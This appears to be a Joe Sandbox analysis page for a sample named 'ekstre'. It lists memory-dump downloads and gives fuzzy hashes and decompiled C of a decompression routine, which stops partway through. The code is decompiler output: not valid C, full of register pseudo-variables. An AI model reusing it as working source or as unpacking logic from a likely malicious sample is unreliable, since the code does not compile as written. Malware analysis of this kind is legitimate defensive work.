Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__ebx = __edx + 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__ebx = __edx + 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
